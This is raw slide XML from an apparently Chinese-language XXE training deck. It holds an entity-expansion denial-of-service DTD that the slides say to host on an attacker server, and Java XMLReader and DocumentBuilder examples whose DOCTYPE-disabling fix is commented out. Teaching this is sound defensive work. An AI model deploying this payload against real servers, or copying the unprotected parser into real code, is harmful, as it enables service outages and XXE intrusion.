                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;tea;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="nn-NO"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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在攻击者服务器放置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dos.dtd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a0</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"dos"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a1</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"%a0;%a0;%a0;%a0;%a0;%a0;%a0;%a0;%a0;%a0;"</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a2</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"%a1;%a1;%a1;%a1;%a1;%a1;%a1;%a1;%a1;%a1;"</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a3</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"%a2;%a2;%a2;%a2;%a2;%a2;%a2;%a2;%a2;%a2;"</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a4</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"%a3;%a3;%a3;%a3;%a3;%a3;%a3;%a3;%a3;%a3;"</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r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ENTITY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"%a4;"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"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endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="324609930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CE9307-BFD7-2535-AF1D-799C964A51F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="2610118"/>
            <a:ext cx="20974768" cy="8402300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>XMLReader</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(@RequestBody String content) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    try {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xmlReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLReaderFactory.createXMLReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>修复：禁用外部实体</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xmlReader.setFeature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("http://apache.org/xml/features/disallow-doctype-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>decl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", true);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xmlReader.parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>InputSource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>StringReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(content)));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        return "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> XXE";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    } catch (Exception e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>e.toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DocumentBuilder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DocumentBuilderFactory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> factory = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DocumentBuilderFactory.newInstance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>修复</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>禁用外部实体</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>factory.setFeature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("http://apache.org/xml/features/disallow-doctype-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>decl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", true);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DocumentBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> builder = </a:t>
            </a:r>
            <a:r>
